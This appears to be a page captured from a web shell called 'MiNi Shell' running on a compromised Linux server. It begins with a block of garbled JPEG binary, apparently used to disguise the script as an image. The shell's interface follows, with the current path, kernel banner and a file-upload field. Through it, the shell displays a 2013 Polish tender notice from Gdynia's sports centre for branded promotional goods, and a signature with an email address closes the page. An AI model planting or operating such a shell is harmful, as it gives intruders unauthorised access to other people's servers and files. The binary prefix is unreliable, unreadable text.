JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130722/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130722/286882-N-2013.html

<p class="kh_header"><b>Gdynia: Dostawa materiałów promocyjno - reklamowych dla potrzeb Gdyńskiego Ośrodka Sportu i Rekreacji</b><br>
<b>Numer ogłoszenia: 286882 - 2013; data zamieszczenia: 22.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gdyński Ośrodek Sportu i Rekreacji , ul. Olimpijska 5/9, 81-538 Gdynia, woj. pomorskie, tel. 058 6223574, faks 058 6223574.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gdyniasport.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiałów promocyjno - reklamowych dla potrzeb Gdyńskiego Ośrodka Sportu i Rekreacji.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiot zamówienia zgodnie z CPV sklasyfikowany jest jako: 22462000-6 - materiały reklamowe.
2.Przedmiotem zamówienia jest dostawa materiałów promocyjno - reklamowych dla potrzeb Gdyńskiego Ośrodka Sportu i Rekreacji.
3.Wykonawca w ramach zamówienia zobowiązany będzie dostarczyć:
1)frotkę z zamkiem błyskawicznym - 950 sztuk - rozciągliwa opaska na nadgarstek z bawełny wraz z kieszonką zapinaną na zamek błyskawiczny; pasująca na nadgarstki o obwodzie od 13 do 23 cm, kolor granatowy,  wymiary 8x8x1 cm, wielkość nadruku 50x35 mm, zakres tolerancji wymiarów +/- 5 %; nadruk biały, logotyp Gdynia Sport zgodnie z wytycznymi Zamawiającego oraz po wcześniejszej akceptacji projektu, czas realizacji zamówienia do 14 dni;
2)saszetkę rowerową do ramy - 400 sztuk - trójkątną, wykonaną z impregnowanego poliestru, zapinana na zamek błyskawiczny, przypinana do ramy roweru na trzy paski z rzepami - dwa do poziomej ramy, jeden do pionowej, usztywniona w obwodzie, kolor granatowy, wymiary 20x35x23 cm; wielkość nadruku: 5x5cm - logotyp Gdynia Sport, zgodnie z wytycznymi Zamawiającego oraz po wcześniejszej akceptacji projektu; zakres tolerancji wymiarów +/- 5 %, czas realizacji zamówienia do 14 dni;
3)okulary do pływania - 300 sztuk - granatowe, z regulowaną gumą, wymiary: 17x5,2 cm, wielkość nadruku nie mniejsza niż 50x8mm - logotyp Gdynia Sport, zgodnie z wytycznymi Zamawiającego oraz po wcześniejszej akceptacji projektu; zakres tolerancji wymiarów +/- 5 %, czas realizacji zamówienia do 14 dni;
4)worek żeglarski - 100 sztuk - kolor granatowy lub granatowo-biały (biały pasek na dole worka), okrągłe dno, sznurowany od góry, wykonany z impregnowanej bawełny o gramaturze co najmniej 200g/m2, sznurek bawełniany koloru białego, wymiary 36x40cm, rozmiar nadruku nie mniejsza niż 20x20cm -  logotyp Gdynia Sport zgodnie z wytycznymi Zamawiającego oraz po wcześniejszej akceptacji projektu, zakres tolerancji wymiarów +/- 5 %, czas realizacji zamówienia do 14 dni;
5)pokrowiec na garnitur - 100 sztuk - koloru granatowego, wymiary 100x60 cm, wykonany z mikrofibry, zapinany na zamek, w komplecie saszetka do spakowania pokrowca - na pokrowcu i saszetce logotyp Gdynia Sport o wymiarach na pokrowiec nie mniejszych niż 20x20cm i wymiary na saszetkę nie mniejsze niż 5x5cm, zgodnie z wytycznymi Zamawiającego oraz po wcześniejszej akceptacji projektu, zakres tolerancji wymiarów +/- 5 %, czas realizacji zamówienia do 14 dni;
6)zegarek LED  - 200 sztuk - kolory: granatowy lub biały, zegarek z ekranem w technologii LED, na gumowym regulowanym pasku, przystosowanym do używania w warunkach wysiłku fizycznego, model typu UNISEX, nadruk - biały lub granatowy - logotyp Gdynia Sport zgodnie z wytycznymi Zamawiającego oraz po wcześniejszej akceptacji projektu, czas realizacji zamówienia do 14 dni;
7)okrągłą przypinkę - 1300 sztuk - tzn. znaczek (button, badzik), przypinka z kolorowym nadrukiem, grafiką zgodnie z wytycznymi Zamawiającego oraz po wcześniejszej akceptacji projektu, tworzywo: metal i emalia, średnica 2cm, zakres tolerancji wymiarów +/- 5 %, czas realizacji zamówienia do 14 dni;
8)wpinkę do marynarki - 300 sztuk - wykonaną z metalu, w kształcie logotypu Gdynia Sport, wytłaczane (nie nadruk), średnica 2x2cm; od wewnętrznej strony - wpinka pozwalająca przypiąć znaczek do materiału; zakres tolerancji wymiarów +/- 5 %,  czas realizacji zamówienia do 14 dni;
9)przypinkę z herbem Gdyni - 500 sztuk - metalowa przypinka (pins) przedstawiający herb Gdyni, przypinka wykonana z tworzywa: metal (w kolorze złotym) i kolorowa emalia (w kolorze czerwonym, białym, złotym),przypinka o wymiarach: 1cmx1,5cm, przypinki (pins) pakowane pojedynczo w foliowe torebki, zgodnie z wytycznymi Zamawiającego oraz po wcześniejszej akceptacji projektu, zakres tolerancji wymiarów +/- 5 %, czas realizacji zamówienia do 14 dni;
10)brelok Gdynia Sport - 1000 sztuk - gumowy brelok w kształcie logotypu Gdynia Sport kolory nadruku - granat i pomarańcz na białym tle, wymiary 4x6cm; zakres tolerancji wymiarów +/- 5 %, czas realizacji zamówienia do 14 dni;
11)krawat - 100 sztuk - granatowy, tzw. śledź, wykonany w 100% z mikrofibry, wymiary 160cmx5cm (w najszerszym punkcie), pojedynczy logotyp Gdynia Sport wyszywany o wymiarach nie mniejszych niż 3x3cm, zgodnie z wytycznymi Zamawiającego oraz po wcześniejszej akceptacji projektu; zakres tolerancji wymiarów +/- 5 %, czas realizacji zamówienia do 14 dni;
12)składany bidon - 1000 sztuk - kolor granatowy, wymiary 12cmx27cmx32cm, wykonany z elastycznego tworzywa (bezpiecznego dla zdrowia) umożliwiającego składanie, dodatkowo przymocowany karabińczyk w tym samym kolorze z możliwością przypięcia do paska, logotyp Gdynia Sport nadrukowany o wymiarach nie mniejszych niż 3x3cm, zgodnie z wytycznymi Zamawiającego oraz po wcześniejszej akceptacji projektu; zakres tolerancji wymiarów +/- 5 %, czas realizacji zamówienia do 14 dni;
13)pokrowiec przeciwdeszczowy na plecak - 800 sztuk - kolor granatowy, materiał - nieprzemakalny nylon, pasujący na plecak o pojemności 30-40l, ściągany gumką, logotyp Gdynia Sport nadrukowany o wymiarach nie mniejszych niż 15x15cm, zgodnie z wytycznymi Zamawiającego oraz po wcześniejszej akceptacji projektu; czas realizacji zamówienia do 14 dni;
14)latarkę czołową - 200 sztuk - wraz z regulowaną nylonową taśmą pozwalającą na noszenie na głowie, logotyp Gdynia Sport o wymiarach nie mniejszych niż 10x5cm, zgodnie z wytycznymi Zamawiającego oraz po wcześniejszej akceptacji projektu; czas realizacji zamówienia do 14 dni;
15)parasol składany - 50 sztuk - w komplecie z pokrowcem, poszycie i pokrowiec wykonany z materiału sztucznego (poliester lub nylon),  ze sznureczkiem w kolorze parasolki, wysokość parasola po złożeniu w pokrowcu 25cm-30cm, przekątna czaszy 75cm-95cm, dwa naprzemienne kolory czaszy parasola (biało - granatowy lub granatowo - pomarańczowy), pojedynczy nadruk na parasolce o wymiarach 12 cm x 9,5 cm w postaci logo Gdynia moje miasto, logo dwukolorowe tj.: białe lub granatowe z czerwonym napisem moje miasto, zgodnie z wytycznymi Zamawiającego oraz po wcześniejszej akceptacji projektu, , zakres tolerancji wymiarów +/- 5 %, czas realizacji zamówienia do 14 dni;
16)kubek termiczny z logo Gdynia moje miasto - 50 sztuk - kubek termiczny z podwójnymi ściankami wykonany z nierdzewnej stali z przykrywką, o wymiarach: wysokość 15 cm - 18 cm, średnica 7 cm - 8 cm, pojemność 350 ml - 400 ml, kubek w kolorze granatowo - srebrnym (metaliczny) lub czarno - srebrnym (metaliczny), kubek pakowany w pojedyncze kartonowe opakowanie, pojedynczy nadruk o wymiarach 6 cm x 5 cm w postaci logo Gdynia moje miasto, logo dwukolorowe tj.: białe lub granatowe z czerwonym napisem moje miasto, zgodnie z wytycznymi Zamawiającego oraz po wcześniejszej akceptacji projektu, zakres tolerancji wymiarów +/- 5 %, czas realizacji zamówienia do 14 dni;
17)kubek termiczny z logo Gdynia Sport - 600 sztuk -  kubek termiczny z podwójnymi ściankami wykonany z nierdzewnej stali z plastikową przykrywką, wymiary: wysokość 15 cm - 18 cm, średnica 7cm - 8 cm, pojemność 350 ml - 400 ml; kolor: granatowo - srebrny (metaliczny) lub czarno - srebrny (metaliczny); pojedynczy nadruk o wymiarach 6 cm x 5 cm w postaci logo Gdynia Sport, zgodnie z wytycznymi Zamawiającego oraz po wcześniejszej akceptacji projektu, zakres tolerancji wymiarów +/- 5 %, czas realizacji zamówienia do 14 dni;
18)maskotkę misia z logo na koszulce - 50 sztuk - pluszowy miś w kolorze brązowym, miś ubrany w koszulkę (białą lub granatową) z nadrukiem logo Gdynia moje miasto, wymiary maskotki miś to: wysokość 16 cm - 20 cm, szerokość 15 cm x 18 cm, pojedynczy nadruk na koszulce o wymiarach 4-6 cm x 3-5 cm w postaci logo Gdynia moje miasto, logo dwukolorowe (białe lub granatowe z czerwonym napisem moje miasto), zgodnie z wytycznymi Zamawiającego oraz po wcześniejszej akceptacji projektu, zakres tolerancji wymiarów +/- 5 %, czas realizacji zamówienia do 14 dni.  
4.Zamawiający informuje, iż ilości wskazane w ust. 3 są ilościami szacowanymi (przewidywanymi przez Zamawiającego). Zamawiający zastrzega sobie prawo do niewykorzystania w całości ilości zamówienia, jeżeli wynikać to będzie z jego faktycznych potrzeb w zakresie przedmiotu umowy. Z tytułu zmniejszenia ilości zamówienia Wykonawcy nie przysługują żadne roszczenia wobec Zamawiającego.
5.Wymagania co do sposobu świadczenia dostawy:
1)dostawa przedmiotu zamówienia realizowana będzie sukcesywnie, zgodnie z zapotrzebowaniem  Zamawiającego i na każdorazowe jego wezwanie,
2)przy każdorazowym zamówieniu Zamawiający będzie miał możliwość dowolnego wyboru ilości produktów, o których mowa w ust. 3,
3)Wykonawca zobowiązany jest:
a)przygotować projekt przedmiotu zamówienia maksymalnie w terminie 2 dni od złożenia zamówienia wraz z wytycznymi Zamawiającego /zgłoszenie faksem lub mailem/ i dostarczyć projekt przedmiotu zamówienia faksem lub mailem lub bezpośrednio do siedziby Zamawiającego, w godzinach urzędowania tj. pomiędzy 8.00 a 15.30,
b)zrealizować zamówienie po akceptacji projektu przedmiotu zamówienia przesłanego faksem lub mailem, w terminach określonych w ust. 3  i dostarczyć zamówienie bezpośrednio do siedziby Zamawiającego, w godzinach urzędowania tj. pomiędzy 8.00 a 15.30.
4)w przypadku stwierdzenia niezgodności ilościowych, pomyłek, uszkodzenia lub wad jakościowych otrzymanego towaru Zamawiający postawi towar do dyspozycji Wykonawcy, oraz niezwłocznie/zgłoszenie telefoniczne potwierdzone faksem lub mailem/ powiadomi Wykonawcę o stwierdzonych brakach i wadach w towarze,
5)Wykonawca będzie zobowiązany w terminie 24 godzin od wpłynięcia reklamacji, zgłoszenie telefoniczne, potwierdzone faksem lub mailem dostarczyć zastępczą partię towaru bezpośrednio do siedziby Zamawiającego, w godzinach jego urzędowania tj. pomiędzy 8.00 a 15.30,
6)Wykonawca zobowiązany będzie do realizacji dostaw na własny koszt, przy udziale własnego środka transportu lub może zlecić dostawę innemu przewoźnikowi,
7)Wykonawca zobowiązany jest należycie zabezpieczyć towar na czas transportu oraz ponosi całkowitą odpowiedzialność za dostawę towaru,
8)wykaz osób upoważnionych do składania zapotrzebowania i odbioru towaru oraz do podpisywania i odbioru faktur w imieniu Zamawiającego zawierać będzie załącznik nr 1 do umowy.
6.Wykonawca zobowiązany jest udzielić rocznej gwarancji i rękojmi za wady na zaoferowany towar. Termin liczony jest osobno dla poszczególnych partii towaru, tj. od daty dostawy poszczególnych partii towaru.
7.Zamawiający dopuszcza realizację zamówienia przez podwykonawców. Wykonawca zobowiązany jest wskazać w ofercie części zamówienia, których wykonanie zamierza powierzyć podwykonawcom. Wykonawca ponosi pełną odpowiedzialność za prace wykonane przez podwykonawców również za usterki gwarancyjne. 
8.Zamawiający nie przewiduje zawarcia umowy ramowej.
9.Zamawiający nie ustanawia dynamicznego systemu zakupów..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 22.46.20.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania się spełnieniem warunku posiadania niezbędnej wiedzy i doświadczenia, Wykonawca musi wykazać się należytym wykonaniem w całości co najmniej jednego zamówienia o charakterze i złożoności porównywalnej do przedmiotu zamówienia, tj. polegającego na dostawie materiałów promocyjno - reklamowych z nadrukiem za łączną kwotę nie mniejszą niż 20.000,00 zł brutto (zamówienie mogło być realizowane sukcesywnie wg potrzeb Zamawiającego), wykonanej w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeśli okres działalności jest krótszy - w tym okresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)pisemne zobowiązanie podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia, w przypadku, o którym mowa w Rozdziale 5 ust. 4 Specyfikacji Istotnych Warunków Zamówienia - w oryginale albo w postaci uwierzytelnionej notarialnie kopii; 
2)dokumenty dotyczące w szczególności charakteru stosunku jaki będzie łączył Wykonawcę z innym podmiotem oraz zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia, w przypadku, o którym mowa w Rozdziale 5 ust. 4  Specyfikacji Istotnych Warunków Zamówienia - w oryginale lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę; w przypadku, gdy powyższe  informacje zostaną zawarte w pisemnym zobowiązaniu, o którym mowa w pkt 1, Wykonawca nie musi przedkładać przedmiotowych dokumentów;</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje, że wprowadzenie zmian do zawartej umowy możliwe będzie w sytuacjach, gdy Zamawiający uzna, że zmiany te są niezbędne celem zapewnienia prawidłowego wykonania umowy przez strony, w szczególności w następujących przypadkach:
1)omyłek pisarskich lub błędów rachunkowych, 
2)mających na celu wyjaśnienie wątpliwości treści umowy, jeśli będzie ona budziła wątpliwości interpretacyjne między stronami, 
3)konieczności zmiany sposobu wykonania lub zakresu zamówienia z przyczyn wcześniej nie przewidzianych,
4)konieczności zmiany terminu wykonania zamówienia z przyczyn niezawinionych przez Wykonawcę, 
5)jeżeli zmiany umowy, w tym zmiany sposobu płatności, wymagać będzie ochrona interesu Zamawiającego,
6)zmiany stawki podatku od towaru i usług w związku ze zmianą obowiązującej stawki podatku od towarów i usług,
7)innych zmian korzystnych dla Zamawiającego, chociażby wiązało się to z koniecznością zmiany terminu lub sposobu wykonania zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gdyniasport.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> GDYŃSKI OŚRODEK SPORTU I REKREACJI - JEDNOSTKA BUDŻETOWA
81 - 538 Gdynia, ul. Olimpijska 5/9.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.07.2013 godzina 09:30, miejsce: Sekretariat Gdyńskiego Ośrodka Sportu i Rekreacji
81 - 538 Gdynia, ul. Olimpijska 5/9.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com